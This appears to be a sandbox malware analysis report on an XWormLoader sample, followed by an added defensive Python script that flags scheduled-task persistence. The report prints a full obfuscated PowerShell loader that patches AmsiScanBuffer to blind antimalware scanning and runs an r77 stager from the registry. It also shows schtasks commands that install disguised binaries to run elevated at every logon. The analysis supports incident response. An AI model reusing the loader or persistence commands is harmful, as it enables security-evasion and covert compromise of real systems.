'S'+'O'+[Char](70)+''+[Char](84)+'W'+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+'ag'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
    signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Drops file in System32 directory; Suspicious use of SetThreadContext; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    PID:4708
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zLKekkAcQBKz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$adVrVglFxMCVww,[Parameter(Position=1)][Type]$CtHTcHsiCi)$mKEKnOLTYId=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+'f'+'l'+''+[Char](101)+'ct'+'e'+''+[Char](100)+''+[Char](68)+''+'e'+'leg'+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+'Mo'+'d'+''+'u'+''+[Char](108)+'e',$False).DefineType(''+'M'+'y'+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+'e'+''+[Char](84)+''+[Char](121)+'p'+[Char](101)+'','Cl'+[Char](97)+'ss'+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+'S'+'ea'+'l'+''+'e'+''+[Char](100)+','+[Char](65)+''+'n'+''+'s'+''+[Char](105)+'C'+'l'+''+'a'+''+'s'+''+[Char](115)+''+','+''+[Char](65)+''+'u'+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+'s'+'',[MulticastDelegate]);$mKEKnOLTYId.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+'p'+''+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+'m'+''+[Char](101)+','+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+'y'+''+[Char](83)+'i'+'g'+''+[Char](44)+'Pu'+[Char](98)+'l'+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$adVrVglFxMCVww).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'an'+'a'+''+'g'+''+[Char](101)+''+'d'+'');$mKEKnOLTYId.DefineMethod('I'+[Char](110)+'v'+[Char](111)+''+'k'+''+[Char](101)+'',''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](72)+'id'+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char]
(101)+'w'+'S'+''+[Char](108)+''+[Char](111)+'t'+[Char](44)+''+'V'+'i'+'r'+''+'t'+''+[Char](117)+''+'a'+'l',$CtHTcHsiCi,$adVrVglFxMCVww).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $mKEKnOLTYId.CreateType();}$fynOAwzELRnoL=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+''+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+'c'+'r'+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+'2'+''+[Char](46)+'U'+'n'+'s'+'a'+''+'f'+'e'+'N'+''+[Char](97)+'t'+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+'h'+'o'+'ds');$VxwzBYUPewFweM=$fynOAwzELRnoL.GetMethod('Ge'+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'c'+''+'A'+''+'d'+''+'d'+''+'r'+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+'t'+[Char](97)+'t'+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RyLKsmYFYSXDFayTtes=zLKekkAcQBKz @([String])([IntPtr]);$tMopxRaipjETbivjIIuyRH=zLKekkAcQBKz 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$OdojkyFPqPj=$fynOAwzELRnoL.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](77)+''+'o'+'d'+[Char](117)+'l'+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object]('ker'+[Char](110)+''+[Char](101)+''+'l'+''+[Char](51)+''+[Char](50)+'.'+'d'+'l'+'l'+'')));$vmvYdigRORuqkT=$VxwzBYUPewFweM.Invoke($Null,@([Object]$OdojkyFPqPj,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+'L'+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+''+'y'+'A')));$cKyJXOTKjnyXeoWQI=$VxwzBYUPewFweM.Invoke($Null,@([Object]$OdojkyFPqPj,[Object]('V'+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+'t'+'')));$wIyPKrh=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vmvYdigRORuqkT,$RyLKsmYFYSXDFayTtes).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+[Char](100)+''+[Char](108)+''+'l'+'');$YwxJjCNbuZgkOdBmU=$VxwzBYUPewFweM.Invoke($Null,@([Object]$wIyPKrh,[Object]('A'+[Char](109)+''+[Char](115)+'iS'+[Char](99)+'an'+[Char](66)+''+[Char](117)+'ffe'+[Char](114)+'')));$PBVqkxGJUr=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cKyJXOTKjnyXeoWQI,$tMopxRaipjETbivjIIuyRH).Invoke($YwxJjCNbuZgkOdBmU,[uint32]8,4,[ref]$PBVqkxGJUr);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$YwxJjCNbuZgkOdBmU,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cKyJXOTKjnyXeoWQI,$tMopxRaipjETbivjIIuyRH).Invoke($YwxJjCNbuZgkOdBmU,[uint32]8,0x20,[ref]$PBVqkxGJUr);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+'F'+''+[Char](84)+'W'+'A'+''+'R'+''+[Char](69)+'').GetValue(''+'$'+'7'+[Char](55)+''+[Char](115)+''+[Char](116)+''+'a'+''+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID: 1456
Process tree (indentation shows parent/child nesting; each entry gives image path, PID and command line; lines marked "signature:" are the behaviours flagged for that process; the first entry is a child of the powershell.EXE process above, PID 1456):

    - C:\Windows\System32\Conhost.exe (PID 5088): \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- c:\windows\system32\svchost.exe (PID 1184): c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
- c:\windows\system32\svchost.exe (PID 1216): c:\windows\system32\svchost.exe -k localservice -s nsi
- c:\windows\system32\svchost.exe (PID 1236): c:\windows\system32\svchost.exe -k localservice -s EventSystem
- c:\windows\system32\svchost.exe (PID 1252): c:\windows\system32\svchost.exe -k netsvcs -s Themes
- c:\windows\system32\svchost.exe (PID 1396): c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
- c:\windows\system32\svchost.exe (PID 1428): c:\windows\system32\svchost.exe -k netsvcs -s UserManager
  - c:\windows\system32\sihost.exe (PID 2580): sihost.exe
- c:\windows\system32\svchost.exe (PID 1472): c:\windows\system32\svchost.exe -k netsvcs -s SENS
- c:\windows\system32\svchost.exe (PID 1540): c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
- c:\windows\system32\svchost.exe (PID 1580): c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
- c:\windows\system32\svchost.exe (PID 1600): c:\windows\system32\svchost.exe -k networkservice -s Dnscache
- C:\Windows\System32\svchost.exe (PID 1680): C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
- c:\windows\system32\svchost.exe (PID 1720): c:\windows\system32\svchost.exe -k localservice -s netprofm
- C:\Windows\System32\svchost.exe (PID 1756): C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
- C:\Windows\system32\svchost.exe (PID 1772): C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
- c:\windows\system32\svchost.exe (PID 1848): c:\windows\system32\svchost.exe -k appmodel -s StateRepository
- c:\windows\system32\svchost.exe (PID 1856): c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
- C:\Windows\System32\spoolsv.exe (PID 1940): C:\Windows\System32\spoolsv.exe
- c:\windows\system32\svchost.exe (PID 1992): c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
- c:\windows\system32\svchost.exe (PID 2144): c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
- c:\windows\system32\svchost.exe (PID 2236): c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
- c:\windows\system32\svchost.exe (PID 2472): c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
  - signature: Suspicious use of AdjustPrivilegeToken
- c:\windows\system32\svchost.exe (PID 2492): c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
- c:\windows\system32\svchost.exe (PID 2588): c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
- c:\windows\system32\svchost.exe (PID 2660): c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
- c:\windows\system32\svchost.exe (PID 2700): c:\windows\system32\svchost.exe -k netsvcs -s Browser
- c:\windows\system32\svchost.exe (PID 2732): c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
- C:\Windows\sysmon.exe (PID 2744): C:\Windows\sysmon.exe
- c:\windows\system32\svchost.exe (PID 2772): c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
- c:\windows\system32\svchost.exe (PID 2788): c:\windows\system32\svchost.exe -k netsvcs -s WpnService
- C:\Windows\system32\wbem\unsecapp.exe (PID 3024): C:\Windows\system32\wbem\unsecapp.exe -Embedding
- c:\windows\system32\svchost.exe (PID 2960): c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
- C:\Windows\Explorer.EXE (PID 3396): C:\Windows\Explorer.EXE
  - signature: Suspicious behavior: GetForegroundWindowSpam
  - signature: Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x64.exe (PID 2452): "C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x64.exe"
    - signature: Suspicious use of WriteProcessMemory
    - C:\Users\Admin\AppData\Local\Temp\svchost.exe (PID 4644): "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
      - signature: Executes dropped EXE
      - signature: Suspicious use of AdjustPrivilegeToken
      - signature: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\schtasks.exe (PID 4668): "schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\svchost.exe" /rl HIGHEST /f
        - signature: Creates scheduled task(s)
      - C:\Users\Admin\AppData\Roaming\Discord\Discord.exe (PID 1224): "C:\Users\Admin\AppData\Roaming\Discord\Discord.exe"
        - signature: Executes dropped EXE
        - signature: Suspicious behavior: EnumeratesProcesses
        - signature: Suspicious use of AdjustPrivilegeToken
        - signature: Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\schtasks.exe (PID 1688): "schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Discord\Discord.exe" /rl HIGHEST /f
          - signature: Creates scheduled task(s)
        - C:\Windows\SysWOW64\schtasks.exe (PID 4600): "schtasks" /delete /tn "Discord" /f
          - C:\Windows\System32\Conhost.exe (PID 3148): \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        - C:\Windows\SysWOW64\cmd.exe (PID 4188): C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0jSt7BAPWqCT.bat" "
          - C:\Windows\System32\Conhost.exe (PID 1828): \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          - C:\Windows\SysWOW64\chcp.com (PID 4708): chcp 65001
          - C:\Windows\SysWOW64\PING.EXE (PID 3088): ping -n 10 localhost
            - signature: Runs ping.exe
        - C:\Users\Admin\AppData\Local\Temp\install.exe (PID 4316): "C:\Users\Admin\AppData\Local\Temp\install.exe"
          - signature: Executes dropped EXE
        - C:\Windows\SysWOW64\SCHTASKS.exe (PID 4320): "SCHTASKS.exe" /create /tn "$77Discord.exe" /tr "'C:\Users\Admin\AppData\Roaming\Discord\Discord.exe'" /sc onlogon /rl HIGHEST
          - signature: Creates scheduled task(s)
          - C:\Windows\System32\Conhost.exe (PID 4636): \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      - C:\Users\Admin\AppData\Local\Temp\install.exe (PID 2120): "C:\Users\Admin\AppData\Local\Temp\install.exe"
        - signature: Executes dropped EXE
      - C:\Windows\SysWOW64\SCHTASKS.exe (PID 4928): "SCHTASKS.exe" /create /tn "$77svchost.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\svchost.exe'" /sc onlogon /rl HIGHEST
        - signature: Creates scheduled task(s)
    - C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x32.exe (PID 4908): "C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x32.exe"
      - signature: Executes dropped EXE
      - C:\Windows\System32\Conhost.exe (PID 2464): \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      - C:\Windows\SysWOW64\WerFault.exe (PID 4224): C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 844
        - signature: Program crash
- C:\Windows\System32\RuntimeBroker.exe (PID 3976): C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\system32\DllHost.exe (PID 1520): C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
- c:\windows\system32\svchost.exe (PID 4700): c:\windows\system32\svchost.exe -k localservice -s CDPSvc
- C:\Windows\system32\svchost.exe (PID 3712): C:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc
- C:\Windows\system32\svchost.exe (PID 1832): C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
- C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe (PID 876): "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
  - signature: Drops file in System32 directory
  - signature: Modifies data under HKEY_USERS
- c:\windows\system32\svchost.exe (PID 2684): c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
- C:\Windows\system32\DllHost.exe (PID 2896): C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
- C:\Windows\system32\ApplicationFrameHost.exe (PID 5008): C:\Windows\system32\ApplicationFrameHost.exe -Embedding
- C:\Windows\System32\InstallAgent.exe (PID 4988): C:\Windows\System32\InstallAgent.exe -Embedding
- C:\Windows\system32\DllHost.exe (PID 4420): C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
- C:\Windows\System32\svchost.exe (PID 4864): C:\Windows\System32\svchost.exe -k WerSvcGroup
- C:\Windows\system32\wbem\wmiprvse.exe (PID 3524): C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
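Two persistence patterns are visible in the tree above. The dropped binaries (the svchost.exe copy in %TEMP% and Discord.exe under %APPDATA%) each register a task with schtasks /create ... /sc ONLOGON ... /rl HIGHEST, so they start with the highest privileges the user holds at every logon, and the "Discord" task is deleted and re-created so the entry always points at the most recently installed copy. The install.exe children then register the same binaries a second time under task names prefixed with $77. That prefix, and the $77stager registry value loaded by the PowerShell stage, are the conventions of the open-source r77 rootkit, which hides processes, files, registry values and scheduled tasks whose names begin with $77; a task that exists in the process trace but not in schtasks /query output on the host is the symptom to look for. The Python below is an added example of a check a responder can run over collected command lines (it is not part of the report and does not query the Task Scheduler itself); the five schtasks lines are the ones from this tree, plus one constructed benign line to show a non-match.

```python
"""Flag scheduled-task persistence from schtasks command lines.

Added example, not part of the sandbox report.  Parses schtasks invocations
recorded in a process tree and raises the indicators a responder would act on:
tasks that run elevated at every logon, task binaries in user-writable
directories, binaries named after Windows system images but living outside
C:\\Windows, and task names carrying the r77 rootkit's '$77' hide prefix.
"""
import re

_ARG = re.compile(r'"[^"]*"|\S+')          # a quoted argument or a bare one
_USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\appdata\\|\\temp\\|\\programdata\\|\\users\\public\\")
_SYSTEM_IMAGES = {"svchost.exe", "csrss.exe", "lsass.exe", "conhost.exe", "dllhost.exe", "explorer.exe"}

# The five schtasks lines from this report's process tree, plus one constructed benign line.
SAMPLE_LINES = [
    r'"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\svchost.exe" /rl HIGHEST /f',
    r'"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Discord\Discord.exe" /rl HIGHEST /f',
    r'"schtasks" /delete /tn "Discord" /f',
    r'''"SCHTASKS.exe" /create /tn "$77Discord.exe" /tr "'C:\Users\Admin\AppData\Roaming\Discord\Discord.exe'" /sc onlogon /rl HIGHEST''',
    r'''"SCHTASKS.exe" /create /tn "$77svchost.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\svchost.exe'" /sc onlogon /rl HIGHEST''',
    r'"schtasks" /create /tn "NightlyBackup" /sc DAILY /st 02:00 /tr "C:\Program Files\Backup\backup.exe"',  # constructed, benign
]


def parse_schtasks(cmdline):
    """Return {'action', 'tn', 'tr', 'sc', 'rl', ...} for a schtasks line, or None otherwise."""
    toks = [t.strip('"') for t in _ARG.findall(cmdline)]
    if not toks or not toks[0].lower().rsplit("\\", 1)[-1].startswith("schtasks"):
        return None
    info = {"action": None}
    i = 1
    while i < len(toks):
        t = toks[i].lower()
        if t in ("/create", "/delete", "/change", "/query", "/run"):
            info["action"] = t[1:]
        elif t in ("/tn", "/tr", "/sc", "/rl", "/ru", "/st") and i + 1 < len(toks):
            info[t[1:]] = toks[i + 1].strip("'\"")   # /tr is often wrapped as "'path'"
            i += 1
        i += 1
    return info


def analyse(cmdline):
    """Indicator tags for one command line; an empty list means nothing suspicious."""
    info = parse_schtasks(cmdline)
    if info is None:
        return []
    tags = []
    name = info.get("tn", "")
    target = info.get("tr", "").lower()
    if name.startswith("$77"):                                   # r77 hide prefix
        tags.append("r77_prefix")
    if (info["action"] == "create" and info.get("sc", "").lower() == "onlogon"
            and info.get("rl", "").lower() == "highest"):
        tags.append("elevated_on_logon")
    if _USER_WRITABLE.search(target):
        tags.append("user_writable_path")
    if target.rsplit("\\", 1)[-1] in _SYSTEM_IMAGES and not target.startswith("c:\\windows\\"):
        tags.append("system_name_masquerade")                    # e.g. svchost.exe in %TEMP%
    return tags


def triage(lines):
    """[(cmdline, tags)] for every line that produced at least one indicator."""
    return [(line, analyse(line)) for line in lines if analyse(line)]


if __name__ == "__main__":
    for line, tags in triage(SAMPLE_LINES):
        print(", ".join(tags), "<-", line)
```

The tags map directly onto what to collect next: elevated_on_logon plus user_writable_path means the task binary itself is the persistence artefact to hash and remove, system_name_masquerade is the classic svchost.exe-outside-System32 tell, and r77_prefix means Task Scheduler listings on the infected host cannot be trusted and the task has to be confirmed from the registry hive or the XML under C:\Windows\System32\Tasks offline.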
Network
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\Local\Temp\0jSt7BAPWqCT.bat
  Filesize: 264B
  MD5: 7e4ac358e29bcd3664557eeb094b754f
  SHA1: 8a6cd618a423564073722d4e8dac82eadb94e3a9
  SHA256: e24fad0f0c507480565e6a74a5c3f346c1b6e797a05f2e50f2fcc372ea6184bc
  SHA512: 47cb73573924ff5282104ad7eff1cc3ed43182e242b73eef7a5d43f4c77221819ddd30f7984505780f3fda953db95f6eaf9eb7013969f66e63eaaea43e95190e
- C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x32.exe
  Filesize: 109KB
  MD5: f3b2ec58b71ba6793adcc2729e2140b1
  SHA1: d9e93a33ac617afe326421df4f05882a61e0a4f2
  SHA256: 2d74eb709aea89a181cf8dfcc7e551978889f0d875401a2f1140487407bf18ae
  SHA512: 473edcaba9cb8044e28e30fc502a08a648359b3ed0deba85e559fe76b484fc8db0fc2375f746851623e30be33da035cec1d6038e1fcf4842a2afb6f9cd397495
- C:\Users\Admin\AppData\Local\Temp\install.exe
  Filesize: 162KB
  MD5: 152e3f07bbaf88fb8b097ba05a60df6e
  SHA1: c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
  SHA256: a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
  SHA512: 2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
- C:\Users\Admin\AppData\Local\Temp\svchost.exe
  Filesize: 409KB
  MD5: 61e7a9eaef04c1617ffff35c0287d234
  SHA1: 5a6ffedd75ac4e07594ccb6974ee8684d5128a35
  SHA256: b2b4be7ae20431c88115d561a6886f22ab3416595338e7e2eb361f0bb428b987
  SHA512: 8ee9fd8d8631dd611ff539fc35ad4c26f7bfb4b8a26de12e03f48f3b87a7f18198c37ec187a1e8393aafb88e468e74c734cafcaf72f73b0afc55822762d767e6
- C:\Windows\Temp\__PSScriptPolicyTest_qee5nvqs.kb1.ps1
  Filesize: 1B
  MD5: c4ca4238a0b923820dcc509a6f75849b
  SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
  SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
  SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
  Filesize: 3KB
  MD5: 56efdb5a0f10b5eece165de4f8c9d799
  SHA1: fa5de7ca343b018c3bfeab692545eb544c244e16
  SHA256: 6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
  SHA512: 91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc
- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: d61d7f65117823a52913b840feed43c6
  SHA1: e2580207e1611dcb229ee9d2b4bb0bd4dbcc884f
  SHA256: d0d50cb4ab1fe4b5dcb9c081d49b33381336fc0ebc7629702ed94d47f7032a86
  SHA512: e4cf12f3642ce8746f39bcfaa6265d105919d1cbe863119f4413aa4c5d307d7d69f0638bd0434d47f651e183ec209f02dd7d44954c790ef4d585155817ed8a3c
- memory/584-87-0x00007FF9B4FC0000-0x00007FF9B4FD0000-memory.dmp (Filesize: 64KB)
- memory/584-86-0x000001BA9DC30000-0x000001BA9DC5B000-memory.dmp (Filesize: 172KB)
- memory/584-81-0x000001BA9DC30000-0x000001BA9DC5B000-memory.dmp (Filesize: 172KB)
- memory/584-79-0x000001BA9DC30000-0x000001BA9DC5B000-memory.dmp (Filesize: 172KB)
- memory/584-78-0x000001BA9DC00000-0x000001BA9DC25000-memory.dmp (Filesize: 148KB)
- memory/640-98-0x00007FF9B4FC0000-0x00007FF9B4FD0000-memory.dmp (Filesize: 64KB)
- memory/640-91-0x000002952BB00000-0x000002952BB2B000-memory.dmp (Filesize: 172KB)
- memory/640-97-0x000002952BB00000-0x000002952BB2B000-memory.dmp (Filesize: 172KB)
- memory/740-109-0x00007FF9B4FC0000-0x00007FF9B4FD0000-memory.dmp (Filesize: 64KB)
- memory/740-102-0x00000226AC250000-0x00000226AC27B000-memory.dmp (Filesize: 172KB)
- memory/740-108-0x00000226AC250000-0x00000226AC27B000-memory.dmp (Filesize: 172KB)
- memory/904-113-0x000001ED4B010000-0x000001ED4B03B000-memory.dmp (Filesize: 172KB)
- memory/904-120-0x00007FF9B4FC0000-0x00007FF9B4FD0000-memory.dmp (Filesize: 64KB)
- memory/904-119-0x000001ED4B010000-0x000001ED4B03B000-memory.dmp (Filesize: 172KB)
- memory/992-124-0x0000017BDDC80000-0x0000017BDDCAB000-memory.dmp (Filesize: 172KB)
- memory/1224-57-0x0000000006490000-0x000000000649A000-memory.dmp (Filesize: 40KB)
- memory/2452-13-0x00007FF9D8440000-0x00007FF9D8E2C000-memory.dmp (Filesize: 9.9MB)
- memory/2452-10-0x00007FF9D8440000-0x00007FF9D8E2C000-memory.dmp (Filesize: 9.9MB)
- memory/2452-1-0x0000000000550000-0x00000000005A8000-memory.dmp (Filesize: 352KB)
- memory/2452-0-0x00007FF9D8443000-0x00007FF9D8444000-memory.dmp (Filesize: 4KB)
- memory/4472-66-0x0000000140000000-0x0000000140008000-memory.dmp (Filesize: 32KB)
- memory/4472-75-0x0000000140000000-0x0000000140008000-memory.dmp (Filesize: 32KB)
- memory/4472-72-0x0000000140000000-0x0000000140008000-memory.dmp (Filesize: 32KB)
- memory/4472-74-0x00007FF9F4AE0000-0x00007FF9F4B8E000-memory.dmp (Filesize: 696KB)
- memory/4472-73-0x00007FF9F4F30000-0x00007FF9F510B000-memory.dmp (Filesize: 1.9MB)
- memory/4472-65-0x0000000140000000-0x0000000140008000-memory.dmp (Filesize: 32KB)
- memory/4472-67-0x0000000140000000-0x0000000140008000-memory.dmp (Filesize: 32KB)
- memory/4472-64-0x0000000140000000-0x0000000140008000-memory.dmp (Filesize: 32KB)
- memory/4644-19-0x0000000005E00000-0x00000000062FE000-memory.dmp (Filesize: 5.0MB)
- memory/4644-21-0x00000000734B0000-0x0000000073B9E000-memory.dmp (Filesize: 6.9MB)
- memory/4644-14-0x00000000734BE000-0x00000000734BF000-memory.dmp (Filesize: 4KB)
- memory/4644-17-0x00000000008F0000-0x000000000095C000-memory.dmp (Filesize: 432KB)
- memory/4644-20-0x0000000005730000-0x00000000057C2000-memory.dmp (Filesize: 584KB)
- memory/4644-35-0x00000000734B0000-0x0000000073B9E000-memory.dmp (Filesize: 6.9MB)
- memory/4644-24-0x0000000006970000-0x00000000069AE000-memory.dmp (Filesize: 248KB)
- memory/4644-23-0x00000000056F0000-0x0000000005702000-memory.dmp (Filesize: 72KB)
- memory/4644-22-0x0000000005640000-0x00000000056A6000-memory.dmp (Filesize: 408KB)
- memory/4708-61-0x0000029A68C60000-0x0000029A68C8A000-memory.dmp (Filesize: 168KB)
- memory/4708-40-0x0000029A68BD0000-0x0000029A68BF2000-memory.dmp (Filesize: 136KB)
- memory/4708-63-0x00007FF9F4AE0000-0x00007FF9F4B8E000-memory.dmp (Filesize: 696KB)
- memory/4708-43-0x0000029A68DA0000-0x0000029A68E16000-memory.dmp (Filesize: 472KB)
- memory/4708-62-0x00007FF9F4F30000-0x00007FF9F510B000-memory.dmp (Filesize: 1.9MB)
- memory/4908-18-0x00000000734B0000-0x0000000073B9E000-memory.dmp (Filesize: 6.9MB)
- memory/4908-750-0x00000000734B0000-0x0000000073B9E000-memory.dmp (Filesize: 6.9MB)
- memory/4908-16-0x00000000010C0000-0x00000000010E0000-memory.dmp (Filesize: 128KB)